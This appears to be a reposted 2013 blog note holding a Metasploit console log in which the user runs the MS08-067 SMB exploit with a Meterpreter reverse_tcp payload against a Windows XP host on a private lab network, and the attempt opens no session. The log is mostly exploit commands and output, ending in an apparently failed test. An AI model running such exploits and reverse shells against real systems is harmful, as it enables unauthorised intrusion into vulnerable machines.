Never stop writing

root@bt:~# msfpro
[*] Starting Metasploit Console...
[-] WARNING! The following modules could not be loaded!
[-]     /opt/metasploit/apps/pro/msf3/modules/exploits/freebsd/local/mmap.rb: NameError uninitialized constant Msf::Post::Common
Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
          ' `    ,   )   .'
             `._ ,  '   /_
                ; ,''-,;' ``-
                 ``-..__``--`

       http://metasploit.pro

       =[ metasploit v4.6.2-1 [core:4.6 api:1.0]
+ -- --=[ 1134 exploits - 715 auxiliary - 194 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops
[*] Successfully loaded plugin: pro
msf > use exploit/windows/smb//ms08_067_netapi
[-] Failed to load module: exploit/windows/smb//ms08_067_netapi
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > info

       Name: Microsoft Server Service Relative Path Stack Corruption
     Module: exploit/windows/smb/ms08_067_netapi
    Version: 0
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great

Provided by:
  hdm <hdm@metasploit.com>
  Brett Moore <brett.moore@insomniasec.com>
  staylor
  jduck <jduck@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic Targeting
  1   Windows 2000 Universal
  2   Windows XP SP0/SP1 Universal
  3   Windows XP SP2 English (AlwaysOn NX)
  4   Windows XP SP2 English (NX)
  5   Windows XP SP3 English (AlwaysOn NX)
  6   Windows XP SP3 English (NX)
  7   Windows 2003 SP0 Universal
  8   Windows 2003 SP1 English (NO NX)
  9   Windows 2003 SP1 English (NX)
  10  Windows 2003 SP1 Japanese (NO NX)
  11  Windows 2003 SP2 English (NO NX)
  12  Windows 2003 SP2 English (NX)
  13  Windows 2003 SP2 German (NO NX)
  14  Windows 2003 SP2 German (NX)
  15  Windows XP SP2 Arabic (NX)
  16  Windows XP SP2 Chinese - Traditional / Taiwan (NX)
  17  Windows XP SP2 Chinese - Simplified (NX)
  18  Windows XP SP2 Chinese - Traditional (NX)
  19  Windows XP SP2 Czech (NX)
  20  Windows XP SP2 Danish (NX)
  21  Windows XP SP2 German (NX)
  22  Windows XP SP2 Greek (NX)
  23  Windows XP SP2 Spanish (NX)
  24  Windows XP SP2 Finnish (NX)
  25  Windows XP SP2 French (NX)
  26  Windows XP SP2 Hebrew (NX)
  27  Windows XP SP2 Hungarian (NX)
  28  Windows XP SP2 Italian (NX)
  29  Windows XP SP2 Japanese (NX)
  30  Windows XP SP2 Korean (NX)
  31  Windows XP SP2 Dutch (NX)
  32  Windows XP SP2 Norwegian (NX)
  33  Windows XP SP2 Polish (NX)
  34  Windows XP SP2 Portuguese - Brazilian (NX)
  35  Windows XP SP2 Portuguese (NX)
  36  Windows XP SP2 Russian (NX)
  37  Windows XP SP2 Swedish (NX)
  38  Windows XP SP2 Turkish (NX)
  39  Windows XP SP3 Arabic (NX)
  40  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
  41  Windows XP SP3 Chinese - Simplified (NX)
  42  Windows XP SP3 Chinese - Traditional (NX)
  43  Windows XP SP3 Czech (NX)
  44  Windows XP SP3 Danish (NX)
  45  Windows XP SP3 German (NX)
  46  Windows XP SP3 Greek (NX)
  47  Windows XP SP3 Spanish (NX)
  48  Windows XP SP3 Finnish (NX)
  49  Windows XP SP3 French (NX)
  50  Windows XP SP3 Hebrew (NX)
  51  Windows XP SP3 Hungarian (NX)
  52  Windows XP SP3 Italian (NX)
  53  Windows XP SP3 Japanese (NX)
  54  Windows XP SP3 Korean (NX)
  55  Windows XP SP3 Dutch (NX)
  56  Windows XP SP3 Norwegian (NX)
  57  Windows XP SP3 Polish (NX)
  58  Windows XP SP3 Portuguese - Brazilian (NX)
  59  Windows XP SP3 Portuguese (NX)
  60  Windows XP SP3 Russian (NX)
  61  Windows XP SP3 Swedish (NX)
  62  Windows XP SP3 Turkish (NX)
  63  Windows 2003 SP2 Japanese (NO NX)
  64  Windows 2003 SP1 Spanish (NO NX)
  65  Windows 2003 SP1 Spanish (NX)
  66  Windows 2003 SP2 Spanish (NO NX)
  67  Windows 2003 SP2 Spanish (NX)

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST                     yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
  Space: 400
  Avoid: 8 characters

Description:
  This module exploits a parsing flaw in the path canonicalization
  code of NetAPI32.dll through the Server Service. This module is
  capable of bypassing NX on some operating systems and service packs.
  The correct target must be used to prevent the Server Service (along
  with a dozen others in the same process) from crashing. Windows XP
  targets seem to handle multiple successful exploitation events, but
  2003 targets will often crash or hang on subsequent attempts. This
  is just the first version of this module, full support for NX bypass
  on 2003, along with other platforms, is still in development.

References:
  http://cvedetails.com/cve/2008-4250/
  http://www.osvdb.org/49243
  http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
  http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.11.14
LHOST => 192.168.11.14
msf exploit(ms08_067_netapi) > set RHOST 192.168.11.18
RHOST => 192.168.11.18
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.11.14:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Chinese - Traditional
[*] Selected Target: Windows XP SP3 Chinese - Traditional (NX)
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > sessions
Active sessions
===============
No active sessions.
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.11.18    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     192.168.11.14    yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(ms08_067_netapi) >

It seems the connection was not established successfully.

Reposted from: https://blog.51cto.com/hackerwang/1246991

Miscellaneous notes, 2013-07-12